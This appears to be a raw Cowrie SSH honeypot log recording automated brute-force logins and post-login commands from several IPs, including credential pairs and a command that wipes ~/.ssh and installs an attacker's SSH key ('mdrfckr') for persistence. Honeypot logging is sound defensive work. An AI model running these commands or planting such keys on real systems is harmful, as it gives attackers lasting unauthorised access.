{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:48:22.733112Z","src_ip":"212.227.235.229","session":"a858904d0eff"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:48:23.083315Z","src_ip":"212.227.235.229","session":"a858904d0eff"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:23.162298Z","src_ip":"212.227.235.229","session":"b6e963ef2265"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:23.163281Z","src_ip":"212.227.235.229","session":"a858904d0eff"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":37850,"dst_ip":"1.2.3.4","dst_port":22,"session":"9acdab00908b","protocol":"ssh","message":"New connection: 36.89.28.139:37850 (1.2.3.4:22) [session: 9acdab00908b]","sensor":"my-vps","timestamp":"2025-08-26T00:48:39.672509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:48:39.673964Z","src_ip":"36.89.28.139","session":"9acdab00908b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:48:39.881076Z","src_ip":"36.89.28.139","session":"9acdab00908b"}
{"eventid":"cowrie.login.success","username":"root","password":"abc159357","message":"login attempt [root/abc159357] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:48:40.750499Z","src_ip":"36.89.28.139","session":"9acdab00908b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:48:41.219985Z","src_ip":"36.89.28.139","session":"9acdab00908b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:48:41.220690Z","src_ip":"36.89.28.139","session":"9acdab00908b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:48:41.221900Z","src_ip":"36.89.28.139","session":"9acdab00908b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:41.430509Z","src_ip":"36.89.28.139","session":"9acdab00908b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:48:41.862320Z","src_ip":"36.89.28.139","session":"9acdab00908b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:48:41.863004Z","src_ip":"36.89.28.139","session":"9acdab00908b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:48:42.073951Z","src_ip":"36.89.28.139","session":"9acdab00908b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:42.074817Z","src_ip":"36.89.28.139","session":"9acdab00908b"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":37862,"dst_ip":"1.2.3.4","dst_port":22,"session":"632a0e32c2a5","protocol":"ssh","message":"New connection: 36.89.28.139:37862 (1.2.3.4:22) [session: 632a0e32c2a5]","sensor":"my-vps","timestamp":"2025-08-26T00:48:42.260942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:48:42.262045Z","src_ip":"36.89.28.139","session":"632a0e32c2a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:48:42.458616Z","src_ip":"36.89.28.139","session":"632a0e32c2a5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:48:43.284130Z","src_ip":"36.89.28.139","session":"632a0e32c2a5"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:44.483202Z","src_ip":"36.89.28.139","session":"632a0e32c2a5"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":42922,"dst_ip":"1.2.3.4","dst_port":22,"session":"6db817eebbf1","protocol":"ssh","message":"New connection: 36.89.28.139:42922 (1.2.3.4:22) [session: 6db817eebbf1]","sensor":"my-vps","timestamp":"2025-08-26T00:48:44.685253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:48:44.686207Z","src_ip":"36.89.28.139","session":"6db817eebbf1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:48:44.879103Z","src_ip":"36.89.28.139","session":"6db817eebbf1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:48:45.694608Z","src_ip":"36.89.28.139","session":"6db817eebbf1"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:45.893607Z","src_ip":"36.89.28.139","session":"9acdab00908b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:48:45.895459Z","src_ip":"36.89.28.139","session":"6db817eebbf1"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":47608,"dst_ip":"1.2.3.4","dst_port":22,"session":"82dc98d3848b","protocol":"ssh","message":"New connection: 45.159.112.103:47608 (1.2.3.4:22) [session: 82dc98d3848b]","sensor":"my-vps","timestamp":"2025-08-26T00:49:00.839704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:49:00.840822Z","src_ip":"45.159.112.103","session":"82dc98d3848b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:49:00.949118Z","src_ip":"45.159.112.103","session":"82dc98d3848b"}
{"eventid":"cowrie.login.failed","username":"gns3","password":"gns3","message":"login attempt [gns3/gns3] failed","sensor":"my-vps","timestamp":"2025-08-26T00:49:01.386288Z","src_ip":"45.159.112.103","session":"82dc98d3848b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42701,"dst_ip":"1.2.3.4","dst_port":22,"session":"96e6b2f3e98b","protocol":"ssh","message":"New connection: 212.227.235.229:42701 (1.2.3.4:22) [session: 96e6b2f3e98b]","sensor":"my-vps","timestamp":"2025-08-26T00:49:01.425521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:49:01.426509Z","src_ip":"212.227.235.229","session":"96e6b2f3e98b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:49:01.662325Z","src_ip":"212.227.235.229","session":"96e6b2f3e98b"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":49628,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec959fd2a82c","protocol":"ssh","message":"New connection: 24.108.102.132:49628 (1.2.3.4:22) [session: ec959fd2a82c]","sensor":"my-vps","timestamp":"2025-08-26T00:49:01.728873Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:49:01.739814Z","src_ip":"24.108.102.132","session":"ec959fd2a82c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:49:01.901950Z","src_ip":"24.108.102.132","session":"ec959fd2a82c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:49:02.497106Z","src_ip":"45.159.112.103","session":"82dc98d3848b"}
{"eventid":"cowrie.login.failed","username":"psybnc","password":"123","message":"login attempt [psybnc/123] failed","sensor":"my-vps","timestamp":"2025-08-26T00:49:02.562329Z","src_ip":"24.108.102.132","session":"ec959fd2a82c"}
{"eventid":"cowrie.login.success","username":"root","password":"789456123","message":"login attempt [root/789456123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:49:02.646215Z","src_ip":"212.227.235.229","session":"96e6b2f3e98b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:49:03.177447Z","src_ip":"212.227.235.229","session":"96e6b2f3e98b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:49:03.178358Z","src_ip":"212.227.235.229","session":"96e6b2f3e98b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:49:03.179191Z","src_ip":"212.227.235.229","session":"96e6b2f3e98b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:49:03.416453Z","src_ip":"212.227.235.229","session":"96e6b2f3e98b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:49:03.731175Z","src_ip":"24.108.102.132","session":"ec959fd2a82c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:49:03.946260Z","src_ip":"212.227.235.229","session":"96e6b2f3e98b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:49:03.946973Z","src_ip":"212.227.235.229","session":"96e6b2f3e98b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:49:04.184809Z","src_ip":"212.227.235.229","session":"96e6b2f3e98b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:49:04.185722Z","src_ip":"212.227.235.229","session":"96e6b2f3e98b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43010,"dst_ip":"1.2.3.4","dst_port":22,"session":"239641f4d884","protocol":"ssh","message":"New connection: 212.227.235.229:43010 (1.2.3.4:22) [session: 239641f4d884]","sensor":"my-vps","timestamp":"2025-08-26T00:49:04.411378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:49:04.412266Z","src_ip":"212.227.235.229","session":"239641f4d884"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-s